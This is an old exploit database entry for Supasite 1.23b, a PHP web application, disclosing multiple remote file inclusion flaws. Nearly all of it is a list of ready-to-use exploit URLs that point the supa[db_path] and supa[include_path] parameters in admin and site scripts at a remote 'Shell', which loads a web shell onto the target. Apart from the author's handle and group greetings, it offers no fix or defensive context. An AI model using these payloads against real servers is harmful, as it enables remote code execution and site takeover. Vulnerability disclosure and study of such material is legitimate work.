Supasite 1.23b - Multiple Remote File Inclusions

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2007-04-21

# Supasite v1.23b <= Multiple Remote File Include Vulnerablitiy
# D.Script: http://belnet.dl.sourceforge.net/sourceforge/supasite/supasite1.23b.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/supasite/common_functions.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_auth_cookies.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_mods.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_news.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_settings.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/admin_topics.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_users.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_utilities.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/backend_site.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/site_comment.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/site_news.php?supa[db_path]=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-21]